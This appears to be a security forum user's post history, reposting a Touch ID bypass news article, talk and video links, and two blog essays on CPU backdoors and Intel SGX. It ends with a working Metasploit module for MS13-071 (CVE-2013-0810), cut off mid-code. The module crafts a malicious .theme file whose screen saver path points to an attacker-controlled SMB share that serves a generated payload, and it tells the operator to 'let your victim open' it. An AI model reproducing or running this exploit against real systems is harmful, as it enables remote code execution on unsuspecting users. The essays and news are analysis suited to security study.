Everything posted by Nytro
-
Off-By-One Exploitation Tutorial
Nytro replied to Nytro's topic in Reverse engineering & exploit development
It's still a (stack-based, in the tutorial) buffer overflow, but one where, due to a small logic error, you only have the possibility of overrunning the buffer by a single byte.
Hackers claim first iPhone 5s fingerprint reader bypass; bounty founder awaiting verification

Summary: One hacker group claims to have bypassed the Apple iPhone 5s fingerprint reader. ZDNet spoke to the founder of a bypass-seeking bounty on how the alleged hack will be verified.

By Zack Whittaker for Zero Day | September 22, 2013

iPhone 5s' fingerprint reader, dubbed "Touch ID." (Image: Apple)

Hackers from the Germany-based Chaos Computer Club (CCC) claim to have bypassed the fingerprint reader in Apple's iPhone 5s, dubbed "Touch ID," just two days after the smartphone first went on sale. In a statement on its website, the CCC confirmed that the bypass had taken place, adding: "A fingerprint of the phone user, photographed from a glass surface, was enough to create a fake finger that could unlock an iPhone 5s secured with Touch ID." The video shows one user enrolling their finger, then later accessing the device using a different finger with a high-resolution latex or wood glue cast. The group detailed in a blog post how it accessed the device using a fake print, by photographing a fingerprint and converting it. "Apple's sensor has just a higher resolution compared to the sensors so far," said CCC spokesperson Frank Rieger on the group's website. "So we only needed to ramp up the resolution of our fake." The Chaos Computer Club is one of the longest-running hacking groups in the world. The CCC produces the world's oldest hacking conference, and this year will celebrate its 30th gathering ("30C3") in Hamburg, Germany, in December.

Bounty on deck, pending confirmation

Nick Depetrillo, who spoke to ZDNet on the phone on Sunday, explained how he set up a fingerprint reader bypass bounty as "putting my money where my mouth is." He submitted $100 of his own money into the crowdsourced pot.
Working in conjunction with cybersecurity expert Robert Graham, who added $500 out of his own pocket to the mix, the two set up the website istouchidhackedyet.com, which catalogs those who pledge money to cracking the iPhone 5s' security feature. The website has been updated with a "Maybe!" message, confirming that a submission has been made by the hacker group, but noting that verification is still pending. To win the bounty, security researchers must video the lifting of a print, "like from a beer mug," and show it unlocking the phone, the website states. Describing the collective bounty as an "honor system," Depetrillo's website has cataloged thousands of dollars in cash (and hundreds of dollars escrowed by independent law firm CipherLaw), numerous bottles of liquor, a book of erotica, and even an iPhone 5c. But according to ZDNet's Violet Blue, who covered this story earlier in September, some are exploiting the high-profile bounty in a bid to generate press attention. One venture capitalist, who was understood to have contributed $10,000 to the bounty — though they declined to add it to a secure escrow account — reportedly misrepresented the project and spoke for the crowdsourced project "at every press opportunity." As a result, many major news outlets mistakenly attributed the project to the venture capitalist rather than to Depetrillo and Graham.

Review and judging process

Depetrillo explained that he, along with Graham, will review and judge the verification process. "The Chaos Computer Club [or any other submitter] will need to show us a complete video, documentation, and walkthrough lifting the print, re-creating the print, and having one human enrol their finger and another human somehow unlock that phone using the first person's print," he said. Depetrillo confirmed that there have been no other submissions yet, but noted that he has a "lot of respect for the CCC."
He told ZDNet that he was "not surprised" when the hacker group appeared to be the first to submit a possible solution. "When we get complete documentation, we will review it and post our own technical justifications why we think this is a winning solution," he added. "If we clearly see and understand this is a sufficient and satisfactory winning solution, we will declare them the winner.

"We want to convince everybody, not just ourselves, so that others could accept it as such. And everyone is free to debate it — and disagree with it. But if we believe there is a winner, we will hand over our promised money." Depetrillo said this is a one-time bounty on his part, but noted that others are welcome to start their own crowdsourced efforts for any additional hacks or bypasses. "But I look forward to sending my $100 to the winner," he said.

Source: Hackers claim first iPhone 5s fingerprint reader bypass; bounty founder awaiting verification | ZDNet
-
Installing And Using Kali Linux, Metasploit, Nmap And More On Android

Description: Installing and using Kali Linux, Metasploit, Nmap and more on Android.

danielhaake.de
twitter.com/3lL060
youtube.com/user/3lL060
facebook.com/arniskinamutay

External link: Kali Linux on Android using Linux Deploy | Kali Linux

Source: Installing And Using Kali Linux, Metasploit, Nmap And More On Android
-
Blackhat Us 2013 - Karsten Nohl - Rooting Sim Cards

Description: SIM cards are among the most widely-deployed computing platforms, with over 7 billion cards in active use. Little is known about their security beyond manufacturer claims. Besides SIM cards' main purpose of identifying subscribers, most of them provide programmable Java runtimes. Based on this flexibility, SIM cards are poised to become an easily extensible trust anchor for otherwise untrusted smartphones, embedded devices, and cars. The protection pretense of SIM cards is based on the understanding that they have never been exploited. This talk ends this myth of unbreakable SIM cards and illustrates that the cards -- like any other computing system -- are plagued by implementation and configuration bugs.

For more information please visit: https://www.blackhat.com/us-13/

Source: Blackhat Us 2013 - Karsten Nohl - Rooting Sim Cards
-
[h=3]More Thoughts on CPU backdoors[/h] I've recently exchanged a few emails with Loic Duflot about CPU-based backdoors. It turned out that he recently wrote a paper about hypothetical CPU backdoors and also implemented some proof-of-concept ones using QEMU (for he doesn't happen to own a private CPU production line). The paper can be bought here. (Loic is an academic, and so he must follow some of the strange customs of the academic world, one of them being that papers are not freely published, but rather sold on a publisher's website… Heck, even we, the ultimately commercialized researchers, still publish our papers and code for free.) Let me stress that what Loic writes about in the paper are only hypothetical backdoors, i.e. no actual backdoors have been found on any real CPU (ever, AFAIK!). What he does is consider how Intel or AMD could implement a backdoor, and then simulate this process by implementing those backdoors inside QEMU. Loic also focuses on local privilege escalation backdoors only. You should not, however, underestimate a good local privilege escalation — such things could be used to break out of any virtual machine, like VMware, or potentially even out of a software VM like, e.g., the Java VM. The backdoors Loic considers are somewhat similar in principle to the simple pseudo-code one-liner backdoor I used in my previous post about hardware backdoors, only more complicated in the actual implementation, as he took care of a few important details that I naturally didn't concern myself with. (BTW, the main message of my previous post was how cool a technology VT-d is, being able to prevent PCI-based backdoors, and not how doomed we are because of Intel- or AMD-induced potential backdoors.)
Some people believe that processor backdoors do not exist in reality, because if they did, the competing CPU makers would be able to find them in each other's products, and would later likely cause a "leak" to the public about such backdoors (think: black PR). Here people make an assumption that AMD or Intel is technically capable of reverse engineering each other's processors, which seems to be a natural consequence of them being able to produce them. I don't think I fully agree with such an assumption, though. Just the fact that you are capable of designing and producing a CPU doesn't mean you can also reverse engineer it. Just the fact that Adobe can write a few-hundred-megabyte application doesn't mean they are automatically capable of reverse engineering similar applications of that size. Even if we assumed that it is technically feasible to use an electron microscope to scan and map all the electronic elements of the processor, there is still the problem of interpreting how all those hundreds of millions of transistors actually work. Anyway, a few more thoughts about properties of hypothetical backdoors that Intel or AMD might use (or be using). First, I think that in such a backdoor scenario everything besides the "trigger" would be encrypted. The trigger is something that you must execute first in order to activate the backdoor (e.g. the CMP instruction with particular, i.e. magic, values in some registers, say EAX, EBX, ECX, EDX). Only then does the backdoor get activated and, e.g., the processor auto-magically escalates into Ring 0. Loic considers this in more detail in his paper. So, my point is that all the attacker's code that executes afterwards (think of it as a shellcode for the backdoor, specific to the OS) is fetched by the processor in an encrypted form and decrypted only internally, inside the CPU.
That should be trivial to implement, while at the same time complicating any potential forensic analysis afterwards — it would be highly non-trivial to understand what the backdoor has actually done. Another crucial thing for a processor backdoor, I think, should be some sort of anti-replay protection. Normally, if a smart admin had been recording all the network traffic, and also all the executables that ever got executed on the host, chances are that he or she would catch the triggering code and the shellcode (which might be encrypted, but still). So, no matter how subtle the trigger is, it is still quite possible that a curious admin will eventually find out that some tetris.exe somehow managed to break out of a hardware VM and did something strange, e.g. installed a rootkit in a hypervisor (or that some Java code somehow was able to send over all our DOCX files from our home directory). Eventually the curious admin will find that strange CPU instruction (the trigger) after which all the strange things happened. Now, if the admin was able to take this code and replicate it, post it to Daily Dave, then, assuming his message passed the moderator (Hi Dave), he would effectively compromise the processor vendor's reputation. An anti-replay mechanism could ideally be some sort of challenge-response protocol used in the trigger. So, instead of always having to put 0xdeadbeef, 0xbabecafe, and 0x41414141 into EAX, EBX and EDX and execute some magic instruction (say CMP), you would have to put in a magic value that is the result of some crypto operation, taking the current date and a magic key as input: Magic = MAGIC(Date, IntelSecretKey). The obvious problem is how the processor can obtain the current date. It would have to talk to the south bridge at best, which is 1) nontrivial, 2) observable on a bus, and 3) spoofable.
A much better idea would be to equip the processor with some sort of EEPROM memory, say big enough to hold one 64-bit or maybe 128-bit value. Each processor would get a different value flashed there when leaving the factory. Now, in order to trigger the backdoor, the processor vendor (or the backdoor operator, think: NSA) would have to do the following:

1) First execute some code that reads this unique value stored in the EEPROM of the particular target processor, and sends it back to them,
2) Now they can generate the actual magic for the trigger: Magic = MAGIC(UniqueValueInEeprom, IntelSecretKey),
3) ...and send the actual code to execute the backdoor and shellcode, with the correct trigger embedded, based on the magic value.

Now, the point is that the processor will automatically increment the unique number stored in the EEPROM, so the same backdoor-exploiting code would not work twice on the same processor (while at the same time it would be easy for the NSA to send another exploit, as they know what the next value in the EEPROM should be). Also, such a customized exploit would not work on any other CPU, as the assumption was that each CPU gets a different value at the factory, so again it would not be possible to replicate the attack and prove that the particular code has ever done something wrong. So, the moment I learn that processors have built-in EEPROM memory, I will start thinking seriously that there are backdoors out there. One thing that bothers me with all those divagations about hypothetical backdoors in processors is that I find them pretty useless at the end of the day. After all, by talking about those backdoors, and how they might be created, we do not make it any easier to protect against them, as there simply is no possible defense here. Also, this doesn't make it any easier for us to build such backdoors (if we wanted to become the bad guys for a change).
It might only be of interest to Intel or AMD, or whatever other processor maker, but I somewhat feel they have already spent much more time thinking about it, and chances are they can probably only laugh at what we are saying here, seeing how unsophisticated our proposed backdoors are. So, my Dear Reader, I think you've just been wasting time reading this post. Sorry for tricking you into this, and I hope to write something more practical next time.

Posted by Joanna Rutkowska at Tuesday, June 02, 2009

Source: The Invisible Things Lab's blog: More Thoughts on CPU backdoors
-
[h=3]Thoughts on Intel's upcoming Software Guard Extensions (Part 2)[/h] In the first part of this article, published a few weeks ago, I discussed the basics of Intel SGX technology, and also discussed challenges with using SGX for securing desktop systems, specifically focusing on the problem of trusted input and output. In this part we will look at some other aspects of Intel SGX, starting with a discussion of how it could be used to create truly irreversible software.

SGX Blackboxing – Apps and malware that cannot be reverse engineered?

A nice feature of Intel SGX is that the processor automatically encrypts the content of SGX-protected memory pages whenever they leave the processor caches and are stored in DRAM. In other words, the code and data used by SGX enclaves never leave the processor in plaintext. This feature, no doubt influenced by the DRM industry, might profoundly change our approach as to who really controls our computers. This is because it will now be easy to create an application, or malware for that matter, that just cannot be reverse engineered in any way. No more IDA, no more debuggers, not even kernel debuggers, could reveal the actual intentions of the EXE file we're about to run. Consider the following scenario, where a user downloads an executable, say blackpill.exe, which in fact logically consists of three parts:

A 1st stage loader (SGX loader), which is unencrypted, and whose task is to set up an SGX enclave, copy the rest of the code there, specifically the 2nd stage loader, and then start executing the 2nd stage loader...

The 2nd stage loader, which starts executing within the enclave, performs remote attestation with an external server and, in case the remote attestation completes successfully, obtains a secret key from the remote server. This code is also delivered in plaintext.
Finally, the encrypted blob, which can only be decrypted using the key obtained by the 2nd stage loader from the remote server, and which contains the actual logic of the application (or malware).

We can easily see that there is no way for the user to figure out what the code from the encrypted blob is going to do on her computer. This is because the key will be released by the remote server only if the 2nd stage loader can prove via remote attestation that it indeed executes within a protected SGX enclave and that it is the original, unmodified loader code that the application's author created. Should one bit of this loader be modified, or should it be run outside of an SGX enclave, or within a somehow misconfigured SGX enclave, the remote attestation would fail and the key would not be obtained. And once the key is obtained, it is available only within the SGX enclave. It cannot be found in DRAM or on the memory bus, even if the user had access to expensive DRAM emulators or bus sniffers. Nor can the key be mishandled by the code that runs in the SGX enclave, because remote attestation also proved that the loader code has not been modified, and the author wrote the loader specifically not to mishandle the key in any way (e.g. not to write it out somewhere to unprotected memory, or store it on disk). Now, the loader uses the key to decrypt the payload, and this decrypted payload remains within the secure enclave, never leaving it, just like the key. Its data never leaves the enclave either... One little catch is how the key is actually sent to the SGX-protected enclave so that it cannot be spoofed in the middle. Of course it must be encrypted, but to which key? Well, we can have our 2nd stage loader generate a new key pair and send the public key to the remote server – the server will then use this public key to send the actual decryption key encrypted with the loader's public key.
This is almost good, except for the fact that this scheme is not immune to a classic man-in-the-middle attack. The solution is easy, though – if I understand correctly the description of the new Quoting and Sealing operations performed by the Quoting Enclave – we can include the hash of the generated public key as part of the data that is signed and put into the Quote message, so the remote server can also be assured that the public key originates from the actual code running in the SGX enclave and not from a Mallory somewhere in the middle. So, what does the application really do? Does it do exactly what has been advertised by its author? Or does it also "accidentally" sniff some system memory, or even read out disk sectors, and send the gathered data to a remote server (encrypted, of course)? We cannot know. And that's quite worrying, I think. One might say that we accept all proprietary software blindly anyway – after all, who fires up IDA to review MS Office before use? Or MS Windows? Or any other application? Probably very few people indeed. But the point is: this could be done, and actually some brave souls do it. It could be done even if the author used some advanced form of obfuscation. It can be done, even if it takes lots of time. Now, with Intel SGX, it suddenly cannot be done anymore. That's quite a revolution, a complete change of the rules. We're no longer masters of our little universe – the computer system – and now somebody else is. Unless there was a way for "Certified Antivirus companies" to get around SGX protection... (see below for more discussion on this).

...And some good applications of SGX

The SGX blackboxing has, however, some good uses too, beyond protecting Hollywood productions and making malware un-analyzable... One particularly attractive possibility is the "trusted cloud", where VMs offered to users could not be eavesdropped on or tampered with by the cloud provider's admins.
I wrote about such a possibility two years ago, but with Intel SGX this could be done much, much better. It would, of course, require a specially written hypervisor which sets up SGX containers for each VM; the VM could then authenticate to the user and prove, via remote attestation, that it is executing inside a properly set up SGX enclave. Note how this time we do not require the hypervisor to authenticate to the users – we just don't care: if our code correctly attests that it is in a correct SGX enclave, all is fine. Suddenly Google could no longer collect and process your calendar, email, documents, and medical records! Or how about a Tor node that could prove to users that it is not backdoored by its own admin and does not keep a log of how connections were routed? Or a safe Bitcoin web-based wallet? It's hard to overestimate how good such a technology might be for bringing privacy to the wide society of users... Assuming, of course, there was no backdoor for the NSA to get around the SGX protection and ruin all this goodness... (see below for more discussion on this).

New OS and VMM architectures

In the paragraph above I mentioned that we will need specially written hypervisors (VMMs) that make use of SGX in order to protect the users' VMs against themselves (i.e. against the hypervisor). We could go further and put other components of a VMM into protected SGX enclaves, things that we currently, in Qubes OS, keep in separate Service VMs, such as networking stacks, USB stacks, etc. Remember that Intel SGX provides a convenient mechanism to build inter-enclave secure communication channels. We could also take the "GUI domain" (currently this is just Dom0 in Qubes OS) and move it into a separate SGX enclave. If only Intel came up with solid protected input and output technologies that worked well with SGX, then this would suddenly make a whole lot of sense (unlike currently, where it is very challenging).
What we win this way is that a bug in the hypervisor should no longer be critical, as an attacker who compromised the hypervisor would still have a long way to go to steal any real secrets of the user, because there are no secrets in the hypervisor itself. In this setup the two most critical enclaves are: 1) the GUI enclave, of course, and 2) the admin enclave, although it is conceivable that the latter could be made reasonably deprivileged, in that it might only be allowed to create/remove VMs and set up networking and other policies for them, but no longer be able to read and write the memory of the VMs (Anti Snowden Protection, ASP?). And... why use hypervisors? Why not use the same approach to compartmentalize ordinary operating systems? Well, this could be done, of course, but it would require a considerable rewrite of the systems, essentially turning them into microkernels (except for the fact that the microkernel would no longer need to be trusted), as well as of the applications and drivers, and we know that this will never happen. Again, let me repeat one more time: the whole point of using virtualization for security is that it wraps up all the huge APIs of an ordinary OS, like Win32 or POSIX, or OSX, into a virtual machine that itself requires an orders-of-magnitude simpler interface to/from the outside world (especially true for paravirtualized VMs), and all this without the need to rewrite the applications.

Trusting Intel – Next Generation of Backdooring?

We have seen that SGX offers a number of attractive features that could potentially make our digital systems more secure and 3rd party servers more trusted. But does it really? The obvious question, especially in the light of recent revelations about the NSA backdooring everything and the kitchen sink, is whether Intel will have backdoors allowing "privileged entities" to bypass SGX protections.

Traditional CPU backdooring

Of course they could, no question about it.
But one can say that Intel (as well as AMD) might have had backdoors in their processors for a long time, not necessarily in anything related to SGX, TPM, TXT, AMT, etc. Intel could have built backdoors into simple MOV or ADD instructions, in such a way that they would automatically disable ring/page protections whenever executed with some magic arguments. I wrote more about this many years ago. The problem with those "traditional" backdoors is that Intel (or a certain agency) could be caught using them, and this might have catastrophic consequences for Intel. Just imagine somebody discovered (during the forensic analysis of an incident) that doing:

MOV eax, $deadbeef
MOV ebx, $babecafe
ADD eax, ebx

...causes ring elevation for the next 1000 cycles. All the affected processors would suddenly become equivalents of the old 8086 and would have to be replaced. Quite a marketing nightmare, I think, no?

Next-generation CPU backdooring

But as more and more crypto and security mechanisms get delegated from software to the processor, the more likely it becomes for Intel (or AMD) to insert really "plausibly deniable" backdoors into processors. Consider e.g. the recent paper on how to plant a backdoor into the Intel Ivy Bridge random number generator (usable via the new RDRAND instruction). The backdoor reduces the actual entropy of the generator, making it feasible to later brute-force any crypto which uses keys generated via the weakened generator. The paper goes to great lengths describing how this backdoor could be injected by a malicious foundry (e.g. one in China), behind Intel's back, which is achieved by implementing the backdoor entirely below the HDL level. The paper takes a "classic" view on the threat model, with Good Americans (Intel engineers) and Bad Chinese (foundry operators/employees).
Nevertheless, it should be obvious that Intel could have planted such a backdoor without any of the effort or challenges described in the paper, because they could do so at any level, not necessarily below HDL. But backdooring an RNG is still something that leaves traces. Even though the backdoored processor can apparently pass all external "randomness" tests, such as the NIST test suite, it still might be caught. Perhaps because somebody will buy 1000 processors, run them for a year, note down all the numbers generated, and then conclude that the distribution is not quite right. Or something like that. Or perhaps because somebody will reverse engineer the processor, and specifically the RNG circuitry, and notice some gates shorted to GND. Or perhaps because somebody at this "Bad Chinese" foundry will notice it. Let's now get back to Intel SGX -- what is the actual Root of Trust for this technology? Of course, the processor, just like for the old ring3/ring0 separation. But for SGX there is an additional Root of Trust which is used for remote attestation, and this is the private key(s) used for signing the Quote messages. If the signing private key somehow got into the hands of an adversary, the remote attestation breaks down completely. Suddenly the "SGX blackboxed" apps and malware can readily be decrypted, disassembled and reverse engineered, because the adversary can now emulate their execution step by step under a debugger and still pass the remote attestation. We might say this is good, as we don't want irreversible malware and apps. But then, suddenly, we also lose our attractive "trusted cloud" – now there is nothing to stop an adversary who has the private signing key from running our trusted VM outside of SGX, yet still reporting to us that it is SGX-protected.
And so, while we believe that our trusted VM should be trusted and unsniffable, and while we entrust all our deepest secrets to it, the adversary can read them all like an open book. And the worst thing is – even if somebody took such a processor, disassembled it into pieces, analyzed it transistor by transistor, recreated the HDL, and analyzed it all, it would still all look good. Because the backdoor is... the leaked private key that is now also in the hands of the adversary, and there is no way to prove that by looking at the processor alone. As I understand it, the whole idea of having a separate TPM chip was exactly to make such backdooring-by-leaking-keys more difficult, because, while we're all forced to use Intel or AMD processors today, it is possible that e.g. every country could produce its own TPM, as it's a million times less complex than a modern processor. So, perhaps Russia could use their own TPMs, which they might be reasonably sure use private keys that have not been handed over to the NSA. However, as I mentioned in the first part of this article, sadly, this scheme doesn't work that well. The processor can still cheat the external TPM module. For example, in the case of Intel TXT and the TPM – the processor can produce incorrect PCR values in response to a certain trigger – in that case it no longer matters that the TPM is trusted and its keys not leaked, because the TPM will sign wrong values. On the other hand, we are then back to using "traditional" backdoors in the processors, whose main disadvantage is that people might get caught using them (e.g. somebody might analyze an exploit which turns out to be triggering a correct Quote message despite incorrect PCRs). So, perhaps the idea of a separate TPM actually does make some sense after all?

What about just accidental bugs in Intel products?

Conspiracy theories aside, what about accidental bugs?
What are the chances of SGX being really foolproof, at least against those unlucky adversaries who didn't get access to the private signing keys? Intel's processors have become quite complex beasts these days. And if you also throw in the Memory Controller Hub, it's an unimaginably complex beast. Let's take a quick tour back through some spectacular attacks against Intel "hardware" security mechanisms. I write "hardware" in quotation marks, because really most of these technologies are software, like most things in electronics these days. Nevertheless, "hardware enforced security" does have a special appeal to lots of people, often creating an impression that these must be some ultimate unbreakable technologies... I think it all started with our exploit against the Intel Q35 chipset (slides 15+), demonstrated back in 2008, which was the first attack allowing the compromise of otherwise hardware-protected SMM memory on Intel platforms (some other attacks against SMM shown before assumed the SMM was not protected, which was the case on many older platforms). This was then shortly followed by another paper from us about attacking Intel Trusted Execution Technology (TXT), which found and exploited the fact that TXT-loaded code was not protected against code running in SMM mode. We used our previous attack on the Q35 against SMM, as well as found a couple of new ones, in order to compromise SMM, plant a backdoor there, and then compromise TXT-loaded code from there. The issue highlighted in the paper has never really been correctly patched. Intel has spent years developing something called the STM, which was supposed to be a thin hypervisor for SMM code sandboxing. I don't know if the Intel STM specification has eventually been made public, how many bugs it might introduce on systems using it, or how inaccurate it might be.
In the following years we presented two more devastating attacks against Intel TXT (neither of which depended on a compromised SMM): one which exploited a subtle bug in the processor's SINIT module, allowing us to misconfigure VT-d protections for TXT-loaded code, and another exploiting a classic buffer overflow bug, also in the processor's SINIT module, allowing us this time not only to fully bypass TXT, but also to fully bypass Intel Launch Control Policy and hijack SMM (several years after our original papers on attacking SMM, the old bugs got patched, and so this was also attractive as yet another way to compromise SMM for whatever other reason). Invisible Things Lab has also presented the first, and as far as I'm aware still the only, attack on an Intel BIOS that allowed reflashing the BIOS despite Intel's strong "hardware" protection mechanism meant to allow only digitally signed code to be flashed. We also found out about a secret processor in the chipset used for execution of Intel AMT code, and we found a way to inject our custom code into this special AMT environment and have it executed in parallel with the main system, unconstrained by any other entity. This is quite a list of significant Intel security failures, which I think gives something to think about. At the very least, that just because something is "hardware enforced" or "hardware protected" doesn't mean it is foolproof against software exploits. Because, it should be clearly said, all our exploits mentioned above were pure software attacks. But, to be fair, we have never been able to break Intel core memory protection (ring separation, page protection) or Intel VT-x.
Rafal Wojtczuk has probably come closest with his SYSRET attack in an attempt to break ring separation, but ultimately Intel's excuse was that the problem was on the side of the OS developers, who didn't notice subtle differences in the behavior of SYSRET between AMD and Intel processors, and didn't make their kernel code defensive enough against the Intel processor's odd behavior. We have also demonstrated rather impressive attacks bypassing Intel VT-d, but, again, to be fair, we should mention that the attacks were possible only on those platforms which Intel didn't equip with so-called Interrupt Remapping hardware, and that Intel knew such hardware was indeed needed and had been planning it a few years before our attacks were published. So, is Intel SGX gonna be as insecure as Intel TXT, or as secure as Intel VT-x....?

The bottom line

Intel SGX promises some incredible functionality – the ability to create protected execution environments (called enclaves) within an untrusted (compromised) Operating System. However, for SGX to be of any use on a client OS, it is important that we also have technologies to implement trusted output and input from/to the SGX enclave. Intel currently provides few details about the former and openly admits it doesn't have the latter. Still, even without trusted input and output technologies, SGX might be very useful in bringing trust to the cloud, by allowing users to create trusted VMs inside an untrusted provider's infrastructure. However, at the same time, it could allow the creation of applications and malware that could not be reverse engineered. It's quite ironic that those two applications (trusted cloud and irreversible malware) are mutually bound together, so that if one wanted to add a backdoor to allow the A/V industry to analyze SGX-protected malware, then this very same backdoor could be used to weaken the guarantees of the trustworthiness of the user VMs in the cloud.
Finally, a problem that is hard to ignore today, in the post-Snowden world, is the ease of backdooring this technology by Intel itself. In fact Intel doesn't need to add anything to their processors – all they need to do is give away the private signing keys used by SGX for remote attestation. This makes for a perfectly deniable backdoor – nobody could catch Intel at it, even if the processor was analyzed transistor-by-transistor, HDL line-by-line. As a system architect I would love to have Intel SGX, and I would love to believe it is secure. It would allow us to further decompose Qubes OS, specifically to get rid of the hypervisor from the TCB, and probably even more. Special thanks to Oded Horowitz for turning my attention towards Intel SGX. Posted by Joanna Rutkowska at Monday, September 23, 2013 Sursa: The Invisible Things Lab's blog: Thoughts on Intel's upcoming Software Guard Extensions (Part 2)
-
I have this one: https://www.microsoft.com/learning/en-us/exam.aspx?id=70-660&locale=en-us Granted, I didn't pay anything for it, but either way it costs about 50 dollars (for students), which I don't think is much. If you want to take a Microsoft certification, talk to the MSP (Microsoft Student Partners) people at your university.
-
MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution Authored by Eduardo Prado, juan vazquez | Site metasploit.com This Metasploit module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Saver" tab is viewed. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::SMBServer def initialize(info={}) super(update_info(info, 'Name' => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution", 'Description' => %q{ This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Saver" tab is viewed. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Eduardo Prado', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2013-0810'], ['OSVDB', '97136'], ['MSB', 'MS13-071'], ['BID', '62176'] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'DefaultOptions' => { 'DisablePayloadHandler' => 'false' }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP3 / Windows 2003 SP2', {}], ], 'Privileged' => false, 'DisclosureDate' => "Sep 10 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']), OptString.new('UNCPATH', [ false, 'Override the UNC path to use (Ex: \\\\192.168.1.1\\share\\exploit.scr)' ]) ], self.class) end def exploit if (datastore['UNCPATH']) @unc = datastore['UNCPATH'] print_status("Remember to share the malicious EXE payload as #{@unc}") else print_status("Generating our malicious executable...") @exe = generate_payload_exe my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] @share = rand_text_alpha(5 + rand(5)) @scr_file = "#{rand_text_alpha(5 + rand(5))}.scr" @hi, @lo = UTILS.time_unix_to_smb(Time.now.to_i) @unc = "\\\\#{my_host}\\#{@share}\\#{@scr_file}" end print_status("Creating '#{datastore['FILENAME']}' file ...") # Default Windows XP / 2003 theme modified theme = <<-EOF ; Copyright © Microsoft Corp. 
1995-2001 [Theme] DisplayName=@themeui.dll,-2016 ; My Computer [CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon] DefaultValue=%WinDir%explorer.exe,0 ; My Documents [CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon] DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0 ; My Network Places [CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon] DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17 ; Recycle Bin [CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon] full=%WinDir%SYSTEM32\\shell32.dll,32 empty=%WinDir%SYSTEM32\\shell32.dll,31 [Control Panel\\Desktop] Wallpaper= TileWallpaper=0 WallpaperStyle=2 Pattern= ScreenSaveActive=0 [boot] SCRNSAVE.EXE=#{@unc} [MasterThemeSelector] MTSM=DABJDKT EOF file_create(theme) print_good("Let your victim open #{datastore['FILENAME']}") if not datastore['UNCPATH'] print_status("Ready to deliver your payload on #{@unc}") super end end # TODO: these smb_* methods should be moved up to the SMBServer mixin # development and test on progress def smb_cmd_dispatch(cmd, c, buff) smb = @state[c] vprint_status("Received command #{cmd} from #{smb[:name]}") pkt = CONST::SMB_BASE_PKT.make_struct pkt.from_s(buff) #Record the IDs smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID'] smb[:user_id] = pkt['Payload']['SMB'].v['UserID'] smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID'] smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID'] case cmd when CONST::SMB_COM_NEGOTIATE smb_cmd_negotiate(c, buff) when CONST::SMB_COM_SESSION_SETUP_ANDX wordcount = pkt['Payload']['SMB'].v['WordCount'] if wordcount == 0x0D # It's the case for Share Security Mode sessions smb_cmd_session_setup(c, buff) else vprint_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... 
") smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end when CONST::SMB_COM_TRANSACTION2 smb_cmd_trans(c, buff) when CONST::SMB_COM_NT_CREATE_ANDX smb_cmd_create(c, buff) when CONST::SMB_COM_READ_ANDX smb_cmd_read(c, buff) else vprint_status("SMB Capture - Ignoring request from #{smb[:name]} - #{smb[:ip]} (#{cmd})") smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end end def smb_cmd_negotiate(c, buff) pkt = CONST::SMB_NEG_PKT.make_struct pkt.from_s(buff) dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/) dialect = dialects.index("NT LM 0.12") || dialects.length-1 pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct smb_set_defaults(c, pkt) time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 17 pkt['Payload'].v['Dialect'] = dialect pkt['Payload'].v['SecurityMode'] = 2 # SHARE Security Mode pkt['Payload'].v['MaxMPX'] = 50 pkt['Payload'].v['MaxVCS'] = 1 pkt['Payload'].v['MaxBuff'] = 4356 pkt['Payload'].v['MaxRaw'] = 65536 pkt['Payload'].v['SystemTimeLow'] = time_lo pkt['Payload'].v['SystemTimeHigh'] = time_hi pkt['Payload'].v['ServerTimeZone'] = 0x0 pkt['Payload'].v['SessionKey'] = 0 pkt['Payload'].v['Capabilities'] = 0x80f3fd pkt['Payload'].v['KeyLength'] = 8 pkt['Payload'].v['Payload'] = Rex::Text.rand_text_hex(8) c.put(pkt.to_s) end def smb_cmd_session_setup(c, buff) pkt = CONST::SMB_SETUP_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 